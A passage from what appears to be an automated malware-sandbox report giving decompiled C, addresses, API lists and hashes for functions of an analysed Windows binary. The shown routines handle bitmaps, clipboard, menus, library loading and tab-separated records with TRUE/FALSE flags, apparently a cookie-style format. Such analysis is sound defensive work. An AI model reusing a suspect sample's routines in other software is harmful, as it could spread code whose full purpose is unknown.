								_v128 = _v128 + 1;
							} while (_v128 < _v88);
						}
						_v96 = _v96 + 1;
					} while (_v96 < _v56);
				}
				SelectObject(_t75, _v76);
				DeleteDC(_t75);
				return _v104;
			}
























                                                                                                                                                0x00402e07
                                                                                                                                                0x00402e0d
                                                                                                                                                0x00402e15
                                                                                                                                                0x00402e16
                                                                                                                                                0x00402e17
                                                                                                                                                0x00402e18
                                                                                                                                                0x00402e19
                                                                                                                                                0x00402e25
                                                                                                                                                0x00402e36
                                                                                                                                                0x00402e41
                                                                                                                                                0x00402e54
                                                                                                                                                0x00402e5e
                                                                                                                                                0x00402e62
                                                                                                                                                0x00402e66
                                                                                                                                                0x00402e6c
                                                                                                                                                0x00402e70
                                                                                                                                                0x00402e74
                                                                                                                                                0x00402e7a
                                                                                                                                                0x00402e83
                                                                                                                                                0x00402e89
                                                                                                                                                0x00402e9c
                                                                                                                                                0x00402ea3
                                                                                                                                                0x00402ea7
                                                                                                                                                0x00402eb3
                                                                                                                                                0x00402eb7
                                                                                                                                                0x00402ebb
                                                                                                                                                0x00402ebf
                                                                                                                                                0x00402ec3
                                                                                                                                                0x00402ec5
                                                                                                                                                0x00402ec7
                                                                                                                                                0x00402ecc
                                                                                                                                                0x00402ece
                                                                                                                                                0x00402ece
                                                                                                                                                0x00402ed0
                                                                                                                                                0x00402ed6
                                                                                                                                                0x00402edb
                                                                                                                                                0x00402ede
                                                                                                                                                0x00402ee0
                                                                                                                                                0x00402ee0
                                                                                                                                                0x00402ef6
                                                                                                                                                0x00402e8b
                                                                                                                                                0x00402e8b
                                                                                                                                                0x00402e8b
                                                                                                                                                0x00402f00
                                                                                                                                                0x00402f06
                                                                                                                                                0x00402f0e
                                                                                                                                                0x00402e7a
                                                                                                                                                0x00402f18
                                                                                                                                                0x00402f20
                                                                                                                                                0x00402e6c
                                                                                                                                                0x00402f2f
                                                                                                                                                0x00402f36
                                                                                                                                                0x00402f46

                                                                                                                                                APIs
                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,0000006E,00000000,00000000,00000000,00001060), ref: 00402DFA
                                                                                                                                                • LoadImageW.USER32 ref: 00402E01
                                                                                                                                                • GetObjectW.GDI32(?,00000018,?), ref: 00402E25
                                                                                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 00402E2C
                                                                                                                                                • SelectObject.GDI32(00000000,?), ref: 00402E39
                                                                                                                                                • GetSysColor.USER32(0000000F), ref: 00402E45
                                                                                                                                                • GetPixel.GDI32(00000000,00000000,00000000), ref: 00402E58
                                                                                                                                                • GetPixel.GDI32(00000000,?,?), ref: 00402E83
                                                                                                                                                • SetPixel.GDI32(00000000,?,?,?), ref: 00402F00
                                                                                                                                                • SelectObject.GDI32(00000000,?), ref: 00402F2F
                                                                                                                                                • DeleteDC.GDI32(00000000), ref: 00402F36
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ObjectPixel$Select$ColorCompatibleCreateDeleteHandleImageLoadModule
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2468767547-0
                                                                                                                                                • Opcode ID: 7033ca8cb5081ea6992c12c0c258a27d757a0da9ef6fc35bb73742e8d51b50bd
                                                                                                                                                • Instruction ID: 6edf35894f1bf038c9276b60c95336d8acf92c36c4475dd3a027cf99260808bc
                                                                                                                                                • Opcode Fuzzy Hash: 7033ca8cb5081ea6992c12c0c258a27d757a0da9ef6fc35bb73742e8d51b50bd
                                                                                                                                                • Instruction Fuzzy Hash: B9419A71508311ABC7109F60DA4896FBBF8FBC9B51F00493EF585A2291C7789448DBA6
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00405F82, Relevance: 16.6, APIs: 11, Instructions: 82COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 75%
                                                                                                                                                			E00405F82() {
				int _v8;
				int _v12;
				void* _v16;
				long _v20;
				long _v24;
				void* _v28;
				intOrPtr _v44;
				intOrPtr _v48;
				void _v52;
				struct HDC__* _t46;

				_v16 = LoadImageW(GetModuleHandleW(0), 0x6e, 0, 0, 0, 0x1060);
				_v52 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				GetObjectW(_v16, 0x18,  &_v52);
				_t46 = CreateCompatibleDC(0);
				_v28 = SelectObject(_t46, _v16);
				_v24 = GetSysColor(0xf);
				_v20 = GetPixel(_t46, 0, 0);
				_v12 = 0;
				if(_v44 > 0) {
					do {
						_v8 = 0;
						if(_v48 > 0) {
							do {
								if(GetPixel(_t46, _v8, _v12) == _v20) {
									SetPixel(_t46, _v8, _v12, _v24);
								}
								_v8 = _v8 + 1;
							} while (_v8 < _v48);
						}
						_v12 = _v12 + 1;
					} while (_v12 < _v44);
				}
				SelectObject(_t46, _v28);
				DeleteDC(_t46);
				return _v16;
			}













                                                                                                                                                0x00405fa5
                                                                                                                                                0x00405faa
                                                                                                                                                0x00405fb0
                                                                                                                                                0x00405fb1
                                                                                                                                                0x00405fb2
                                                                                                                                                0x00405fb3
                                                                                                                                                0x00405fb4
                                                                                                                                                0x00405fbe
                                                                                                                                                0x00405fce
                                                                                                                                                0x00405fd9
                                                                                                                                                0x00405feb
                                                                                                                                                0x00405ff3
                                                                                                                                                0x00405ff6
                                                                                                                                                0x00405ff9
                                                                                                                                                0x00405ffb
                                                                                                                                                0x00405ffe
                                                                                                                                                0x00406001
                                                                                                                                                0x00406003
                                                                                                                                                0x0040600f
                                                                                                                                                0x0040601b
                                                                                                                                                0x0040601b
                                                                                                                                                0x00406021
                                                                                                                                                0x00406027
                                                                                                                                                0x00406003
                                                                                                                                                0x0040602c
                                                                                                                                                0x00406032
                                                                                                                                                0x00405ffb
                                                                                                                                                0x0040603b
                                                                                                                                                0x00406042
                                                                                                                                                0x0040604f

                                                                                                                                                APIs
                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00405F8E
                                                                                                                                                • LoadImageW.USER32 ref: 00405F9F
                                                                                                                                                • GetObjectW.GDI32(?,00000018,?), ref: 00405FBE
                                                                                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 00405FC5
                                                                                                                                                • SelectObject.GDI32(00000000,?), ref: 00405FD1
                                                                                                                                                • GetSysColor.USER32(0000000F), ref: 00405FDC
                                                                                                                                                • GetPixel.GDI32(00000000,00000000,00000000), ref: 00405FEE
                                                                                                                                                • GetPixel.GDI32(00000000,?,?), ref: 0040600A
                                                                                                                                                • SetPixel.GDI32(00000000,?,?,?), ref: 0040601B
                                                                                                                                                • SelectObject.GDI32(00000000,?), ref: 0040603B
                                                                                                                                                • DeleteDC.GDI32(00000000), ref: 00406042
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ObjectPixel$Select$ColorCompatibleCreateDeleteHandleImageLoadModule
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2468767547-0
                                                                                                                                                • Opcode ID: 1a7923fc47ade543c6afb8f7e3d9ec78faebe15cd473db001480de50e0d72165
                                                                                                                                                • Instruction ID: 96ffd5419d12e5b7e39f9d209f068ed4cf2d1907ffa725acb483dd1c78e641ad
                                                                                                                                                • Opcode Fuzzy Hash: 1a7923fc47ade543c6afb8f7e3d9ec78faebe15cd473db001480de50e0d72165
                                                                                                                                                • Instruction Fuzzy Hash: A321F0B5D00219FBCB21ABE4DE889EEBFB9FF08751F104876F601B2152C7745A449BA4
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00405559, Relevance: 16.6, APIs: 11, Instructions: 59clipboardmemoryfileCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E00405559(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				long _v8;
				void* _v12;
				long _v16;
				void* _t17;
				void* _t32;
				void* _t37;
				long _t39;

				_v8 = _v8 & 0x00000000;
				EmptyClipboard();
				_t17 = E00405338(_a4);
				_v12 = _t17;
				if(_t17 == 0xffffffff) {
					_v8 = GetLastError();
				} else {
					_t39 = GetFileSize(_t17, 0);
					_t5 = _t39 + 2; // 0x2
					_t32 = GlobalAlloc(0x2000, _t5);
					if(_t32 == 0) {
						L4:
						_v8 = GetLastError();
					} else {
						_t37 = GlobalLock(_t32);
						if(ReadFile(_v12, _t37, _t39,  &_v16, 0) == 0) {
							goto L4;
						} else {
							 *(_t37 + (_t39 >> 1) * 2) =  *(_t37 + (_t39 >> 1) * 2) & 0x00000000;
							GlobalUnlock(_t32);
							SetClipboardData(0xd, _t32);
						}
					}
					CloseHandle(_v12);
				}
				CloseClipboard();
				return _v8;
			}










                                                                                                                                                0x0040555f
                                                                                                                                                0x00405563
                                                                                                                                                0x0040556c
                                                                                                                                                0x00405575
                                                                                                                                                0x00405578
                                                                                                                                                0x004055f1
                                                                                                                                                0x0040557a
                                                                                                                                                0x00405586
                                                                                                                                                0x00405588
                                                                                                                                                0x00405597
                                                                                                                                                0x0040559b
                                                                                                                                                0x004055d4
                                                                                                                                                0x004055da
                                                                                                                                                0x0040559d
                                                                                                                                                0x004055a6
                                                                                                                                                0x004055b9
                                                                                                                                                0x00000000
                                                                                                                                                0x004055bb
                                                                                                                                                0x004055bd
                                                                                                                                                0x004055c3
                                                                                                                                                0x004055cc
                                                                                                                                                0x004055cc
                                                                                                                                                0x004055b9
                                                                                                                                                0x004055e0
                                                                                                                                                0x004055e8
                                                                                                                                                0x004055f4
                                                                                                                                                0x004055fe

                                                                                                                                                APIs
                                                                                                                                                • EmptyClipboard.USER32 ref: 00405563
                                                                                                                                                  • Part of subcall function 00405338: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,00403FF7,?,?,00000000,00403B9A,?), ref: 0040534A
                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 00405580
                                                                                                                                                • GlobalAlloc.KERNEL32(00002000,00000002), ref: 00405591
                                                                                                                                                • GlobalLock.KERNEL32 ref: 0040559E
                                                                                                                                                • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 004055B1
                                                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 004055C3
                                                                                                                                                • SetClipboardData.USER32 ref: 004055CC
                                                                                                                                                • GetLastError.KERNEL32 ref: 004055D4
                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 004055E0
                                                                                                                                                • GetLastError.KERNEL32 ref: 004055EB
                                                                                                                                                • CloseClipboard.USER32 ref: 004055F4
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3604893535-0
                                                                                                                                                • Opcode ID: 59ceb6b3a235d8f074aa04a98775147e6836de81911978fc41fe46ee66c441fd
                                                                                                                                                • Instruction ID: 38fb76984466a98f40b20a1ffdead2548e4c0d81c76d76b6fa97ca59cfc580cd
                                                                                                                                                • Opcode Fuzzy Hash: 59ceb6b3a235d8f074aa04a98775147e6836de81911978fc41fe46ee66c441fd
                                                                                                                                                • Instruction Fuzzy Hash: 23114F76500605FBDB20ABB0EE4CA9F7BB8EB04351F104176F502F6691DB749909CB68
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 0040228C, Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 137timeCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 74%
                                                                                                                                                			E0040228C(void* __edx, void* __esi, void* __eflags, intOrPtr _a4) {
				intOrPtr _v20;
				struct _SYSTEMTIME _v88;
				void* _v92;
				struct _FILETIME _v96;
				void* __edi;
				signed int _t29;
				signed int _t34;
				signed int _t39;
				char* _t44;
				void* _t56;
				signed int _t60;
				signed int _t64;
				signed int _t70;
				signed int _t77;
				long _t90;
				intOrPtr _t91;
				void* _t97;
				signed int _t98;
				signed int _t99;

				_t97 = __esi;
				_t81 =  *((intOrPtr*)(__esi + 0x10));
				_t91 = _a4;
				_t29 = E00406306(0x412320,  *((intOrPtr*)(__esi + 0x10)));
				_t77 = 0x40f454;
				if(_t29 != 0) {
					_t77 = _t29;
				}
				_t99 = _t98 | 0xffffffff;
				_t106 =  *(_t97 + 0x40) & 0x00004000;
				if(( *(_t97 + 0x40) & 0x00004000) != 0) {
					E004063DD(_t99, _t81, _t91, _t106, ".");
				}
				E004063DD(_t99, _t81, _t91, _t106, _t77);
				_t78 = "\t";
				E004063DD(_t99, _t81, _t91, _t106, "\t");
				_t107 =  *(_t97 + 0x40) & 0x00004000;
				_t34 = _t99;
				if(( *(_t97 + 0x40) & 0x00004000) == 0) {
					_push(L"FALSE");
				} else {
					_push(L"TRUE");
				}
				E004063DD(_t34, _t81, _t91, _t107);
				E004063DD(_t99, _t81, _t91, _t107);
				_t82 =  *((intOrPtr*)(_t97 + 0x14));
				_t39 = E00406306(0x412320,  *((intOrPtr*)(_t97 + 0x14)));
				_t108 = _t39;
				if(_t39 == 0) {
					_t39 = 0x40f454;
				}
				E004063DD(_t99, _t82, _t91, _t108, _t39);
				E004063DD(_t99, _t82, _t91, _t108, _t78);
				_t109 =  *(_t97 + 0x40) & 0x00000001;
				_t44 = L"TRUE";
				if(( *(_t97 + 0x40) & 0x00000001) == 0) {
					_t44 = L"FALSE";
				}
				E004063DD(_t99, _t82, _t91, _t109, _t44);
				E004063DD(_t99, _t82, _t91, _t109, _t78);
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_v88.wYear = 0x7b2;
				_v88.wDay = 1;
				_v88.wMonth = 1;
				SystemTimeToFileTime( &_v88,  &_v96);
				_t90 = _v96.dwLowDateTime;
				asm("sbb ecx, edi");
				_t56 = E0040E380( *((intOrPtr*)(_t97 + 0x30)) - _t90,  *((intOrPtr*)(_t97 + 0x34)), 0x989680, 0);
				_push(_t90);
				_push(_t56);
				_push(L"%I64d");
				_push(0x1f);
				_push( &_v88);
				L0040DFD6();
				_t96 = _v20;
				_t60 = E004063DD( &_v88 | 0xffffffff,  *((intOrPtr*)(_t97 + 0x34)), _v20, _t109,  &_v88);
				_t80 = "\t";
				E004063DD(_t60 | 0xffffffff,  *((intOrPtr*)(_t97 + 0x34)), _v20, _t109, "\t");
				_t85 =  *((intOrPtr*)(_t97 + 0x18));
				_t64 = E00406306(0x412320,  *((intOrPtr*)(_t97 + 0x18)));
				_t110 = _t64;
				if(_t64 == 0) {
					_t64 = 0x40f454;
				}
				E004063DD(E004063DD(_t64 | 0xffffffff, _t85, _t96, _t110, _t64) | 0xffffffff, _t85, _t96, _t110, _t80);
				_t86 =  *((intOrPtr*)(_t97 + 0x1c));
				_t70 = E00406306(0x412320,  *((intOrPtr*)(_t97 + 0x1c)));
				_t111 = _t70;
				if(_t70 == 0) {
					_t70 = 0x40f454;
				}
				return E004063DD(E004063DD(_t70 | 0xffffffff, _t86, _t96, _t111, _t70) | 0xffffffff, _t86, _t96, E004063DD(_t70 | 0xffffffff, _t86, _t96, _t111, _t70) | 0xffffffff, L"\r\n");
			}






















                                                                                                                                                0x0040228c
                                                                                                                                                0x0040228c
                                                                                                                                                0x00402295
                                                                                                                                                0x0040229e
                                                                                                                                                0x004022a5
                                                                                                                                                0x004022aa
                                                                                                                                                0x004022ac
                                                                                                                                                0x004022ac
                                                                                                                                                0x004022ae
                                                                                                                                                0x004022b1
                                                                                                                                                0x004022b7
                                                                                                                                                0x004022c0
                                                                                                                                                0x004022c0
                                                                                                                                                0x004022c8
                                                                                                                                                0x004022cd
                                                                                                                                                0x004022d5
                                                                                                                                                0x004022da
                                                                                                                                                0x004022e0
                                                                                                                                                0x004022e2
                                                                                                                                                0x004022eb
                                                                                                                                                0x004022e4
                                                                                                                                                0x004022e4
                                                                                                                                                0x004022e4
                                                                                                                                                0x004022f0
                                                                                                                                                0x004022f8
                                                                                                                                                0x004022fd
                                                                                                                                                0x00402305
                                                                                                                                                0x0040230a
                                                                                                                                                0x0040230c
                                                                                                                                                0x0040230e
                                                                                                                                                0x0040230e
                                                                                                                                                0x00402316
                                                                                                                                                0x0040231e
                                                                                                                                                0x00402323
                                                                                                                                                0x00402327
                                                                                                                                                0x0040232c
                                                                                                                                                0x0040232e
                                                                                                                                                0x0040232e
                                                                                                                                                0x00402336
                                                                                                                                                0x0040233e
                                                                                                                                                0x00402349
                                                                                                                                                0x0040234a
                                                                                                                                                0x0040234b
                                                                                                                                                0x0040234c
                                                                                                                                                0x00402358
                                                                                                                                                0x0040235f
                                                                                                                                                0x00402366
                                                                                                                                                0x0040236d
                                                                                                                                                0x0040238d
                                                                                                                                                0x00402399
                                                                                                                                                0x0040239d
                                                                                                                                                0x004023a2
                                                                                                                                                0x004023a3
                                                                                                                                                0x004023a4
                                                                                                                                                0x004023ad
                                                                                                                                                0x004023af
                                                                                                                                                0x004023b0
                                                                                                                                                0x004023b5
                                                                                                                                                0x004023c7
                                                                                                                                                0x004023cc
                                                                                                                                                0x004023d5
                                                                                                                                                0x004023da
                                                                                                                                                0x004023e4
                                                                                                                                                0x004023e9
                                                                                                                                                0x004023eb
                                                                                                                                                0x004023ed
                                                                                                                                                0x004023ed
                                                                                                                                                0x004023ff
                                                                                                                                                0x00402404
                                                                                                                                                0x00402409
                                                                                                                                                0x0040240e
                                                                                                                                                0x00402410
                                                                                                                                                0x00402412
                                                                                                                                                0x00402412
                                                                                                                                                0x00402433

                                                                                                                                                APIs
                                                                                                                                                • SystemTimeToFileTime.KERNEL32(0040F608,0040F454,0040F608,TRUE,0040F608), ref: 0040236D
                                                                                                                                                • __aulldiv.LIBCMT ref: 0040239D
                                                                                                                                                • _snwprintf.MSVCRT ref: 004023B0
                                                                                                                                                  • Part of subcall function 004063DD: wcslen.MSVCRT ref: 004063F9
                                                                                                                                                  • Part of subcall function 004063DD: memcpy.MSVCRT ref: 0040641C
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Time$FileSystem__aulldiv_snwprintfmemcpywcslen
                                                                                                                                                • String ID: #A$ #A$ #A$%I64d$FALSE$TRUE
                                                                                                                                                • API String ID: 1007903050-2074899967
                                                                                                                                                • Opcode ID: b9360966ef7f6412c30b58f45b026677565554216b57faebb1f3e34bdffda112
                                                                                                                                                • Instruction ID: 8e4ed6724c6830059bb234df0f7beb71b8df579462f7a4d2eaf4f2db12cb8827
                                                                                                                                                • Opcode Fuzzy Hash: b9360966ef7f6412c30b58f45b026677565554216b57faebb1f3e34bdffda112
                                                                                                                                                • Instruction Fuzzy Hash: 9041B5613002042BD260BE7A9D45A1B7299AF94318B014A3FBD66F76D3DBBCE81D4369
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 0040699E, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 48%
                                                                                                                                                			E0040699E(void* __ecx, void* __eflags, int _a4, struct tagMENUITEMINFOW _a8, intOrPtr _a12, int _a24, intOrPtr _a28, wchar_t* _a44, intOrPtr _a48, long _a56, void _a58, short _a8256, void _a8258) {
				wchar_t* _v0;
				int _v4;
				int _t39;
				wchar_t* _t49;
				void* _t51;
				int _t67;
				intOrPtr _t68;
				signed int _t70;
				signed int _t71;

				_t59 = __ecx;
				_t71 = _t70 & 0xfffffff8;
				E0040E340(0x404c, __ecx);
				_t39 = GetMenuItemCount(_a8.cbSize);
				_a4 = _t39;
				_v4 = 0;
				if(_t39 <= 0) {
					L15:
					return _t39;
				} else {
					do {
						memset( &_a58, 0, 0x2000);
						_t71 = _t71 + 0xc;
						_a44 =  &_a56;
						_a8.cbSize = 0x30;
						_a12 = 0x36;
						_a48 = 0x1000;
						_a56 = 0;
						if(GetMenuItemInfoW(_a8.cbSize, _v4, 1,  &_a8) == 0) {
							goto L14;
						}
						if(_a56 == 0) {
							L12:
							_t80 = _a28;
							if(_a28 != 0) {
								_push(0);
								_push(_a28);
								_push(_a4);
								E0040699E(_t59, _t80);
								_t71 = _t71 + 0xc;
							}
							goto L14;
						}
						_t67 = _a24;
						_a8256 = 0;
						memset( &_a8258, 0, 0x2000);
						_t49 = wcschr( &_a56, 9);
						_t71 = _t71 + 0x14;
						_v0 = _t49;
						if(_a28 != 0) {
							if(_a12 == 0) {
								 *0x412c34 =  *0x412c34 + 1;
								_t68 =  *0x412c34; // 0x0
								_t67 = _t68 + 0x11558;
								__eflags = _t67;
							} else {
								_t67 = _v4 + 0x11171;
							}
						}
						_t51 = E00406D16(_t67,  &_a8256);
						_pop(_t59);
						if(_t51 != 0) {
							if(_v0 != 0) {
								wcscat( &_a8256, _v0);
								_pop(_t59);
							}
							ModifyMenuW(_a8, _v4, 0x400, _t67,  &_a8256);
						}
						goto L12;
						L14:
						_v4 = _v4 + 1;
						_t39 = _v4;
					} while (_t39 < _a4);
					goto L15;
				}
			}












                                                                                                                                                0x0040699e
                                                                                                                                                0x004069a1
                                                                                                                                                0x004069a9
                                                                                                                                                0x004069b4
                                                                                                                                                0x004069be
                                                                                                                                                0x004069c2
                                                                                                                                                0x004069c6
                                                                                                                                                0x00406af3
                                                                                                                                                0x00406af9
                                                                                                                                                0x004069cc
                                                                                                                                                0x004069d1
                                                                                                                                                0x004069d8
                                                                                                                                                0x004069dd
                                                                                                                                                0x004069e4
                                                                                                                                                0x004069f3
                                                                                                                                                0x004069fe
                                                                                                                                                0x00406a06
                                                                                                                                                0x00406a0e
                                                                                                                                                0x00406a1b
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00406a26
                                                                                                                                                0x00406acb
                                                                                                                                                0x00406acb
                                                                                                                                                0x00406acf
                                                                                                                                                0x00406ad1
                                                                                                                                                0x00406ad2
                                                                                                                                                0x00406ad6
                                                                                                                                                0x00406ad9
                                                                                                                                                0x00406ade
                                                                                                                                                0x00406ade
                                                                                                                                                0x00000000
                                                                                                                                                0x00406acf
                                                                                                                                                0x00406a2c
                                                                                                                                                0x00406a3a
                                                                                                                                                0x00406a42
                                                                                                                                                0x00406a4e
                                                                                                                                                0x00406a53
                                                                                                                                                0x00406a5a
                                                                                                                                                0x00406a5e
                                                                                                                                                0x00406a63
                                                                                                                                                0x00406a71
                                                                                                                                                0x00406a77
                                                                                                                                                0x00406a7d
                                                                                                                                                0x00406a7d
                                                                                                                                                0x00406a65
                                                                                                                                                0x00406a69
                                                                                                                                                0x00406a69
                                                                                                                                                0x00406a63
                                                                                                                                                0x00406a8c
                                                                                                                                                0x00406a94
                                                                                                                                                0x00406a95
                                                                                                                                                0x00406a9b
                                                                                                                                                0x00406aa9
                                                                                                                                                0x00406aaf
                                                                                                                                                0x00406aaf
                                                                                                                                                0x00406ac5
                                                                                                                                                0x00406ac5
                                                                                                                                                0x00000000
                                                                                                                                                0x00406ae1
                                                                                                                                                0x00406ae1
                                                                                                                                                0x00406ae5
                                                                                                                                                0x00406ae9
                                                                                                                                                0x00000000
                                                                                                                                                0x004069d1

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                                                                                                • String ID: 0$6
                                                                                                                                                • API String ID: 4066108131-3849865405
                                                                                                                                                • Opcode ID: 89f899f7243dee98bcbd5a103440f16ff97d5f32f15a1ba4fc358b67112b384b
                                                                                                                                                • Instruction ID: b215381df5749c23a569ed6f67112db3caf5a45f0159d48b34fa9b4edc30ae2f
                                                                                                                                                • Opcode Fuzzy Hash: 89f899f7243dee98bcbd5a103440f16ff97d5f32f15a1ba4fc358b67112b384b
                                                                                                                                                • Instruction Fuzzy Hash: D731AFB2508344AFCB209F91C84099BB7E8EF84314F04893EFA49A2291D775D914CF9A
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00402754, Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 58%
                                                                                                                                                			E00402754(void* __ecx) {
				intOrPtr _v8;
				char _v12;
				struct HWND__* _t6;
				_Unknown_base(*)()* _t11;
				struct HWND__* _t15;
				void* _t20;
				struct HINSTANCE__* _t23;

				_v12 = 8;
				_v8 = 0xff;
				_t15 = 0;
				_t20 = 0;
				_t23 = LoadLibraryW(L"comctl32.dll");
				if(_t23 == 0) {
					L5:
					__imp__#17();
					_t6 = 1;
					L6:
					if(_t6 != 0) {
						return 1;
					} else {
						MessageBoxW(_t6, L"Error: Cannot load the common control classes.", L"Error", 0x30);
						return 0;
					}
				}
				_t11 = GetProcAddress(_t23, "InitCommonControlsEx");
				if(_t11 != 0) {
					_t20 = 1;
					_t15 =  *_t11( &_v12);
				}
				FreeLibrary(_t23);
				if(_t20 == 0) {
					goto L5;
				} else {
					_t6 = _t15;
					goto L6;
				}
			}










                                                                                                                                                0x00402761
                                                                                                                                                0x00402768
                                                                                                                                                0x0040276f
                                                                                                                                                0x00402771
                                                                                                                                                0x00402779
                                                                                                                                                0x0040277d
                                                                                                                                                0x004027a7
                                                                                                                                                0x004027a7
                                                                                                                                                0x004027af
                                                                                                                                                0x004027b0
                                                                                                                                                0x004027b5
                                                                                                                                                0x004027d2
                                                                                                                                                0x004027b7
                                                                                                                                                0x004027c4
                                                                                                                                                0x004027cd
                                                                                                                                                0x004027cd
                                                                                                                                                0x004027b5
                                                                                                                                                0x00402785
                                                                                                                                                0x0040278d
                                                                                                                                                0x00402793
                                                                                                                                                0x00402796
                                                                                                                                                0x00402796
                                                                                                                                                0x00402799
                                                                                                                                                0x004027a1
                                                                                                                                                0x00000000
                                                                                                                                                0x004027a3
                                                                                                                                                0x004027a3
                                                                                                                                                0x00000000
                                                                                                                                                0x004027a3

                                                                                                                                                APIs
                                                                                                                                                • LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040BEB0,00000000,?,00000002,?,0040E23C,00000000,?,0000000A), ref: 00402773
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00402785
                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040BEB0,00000000,?,00000002,?,0040E23C,00000000,?,0000000A), ref: 00402799
                                                                                                                                                • #17.COMCTL32(?,00000002,?,?,?,0040BEB0,00000000,?,00000002,?,0040E23C,00000000,?,0000000A), ref: 004027A7
                                                                                                                                                • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 004027C4
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
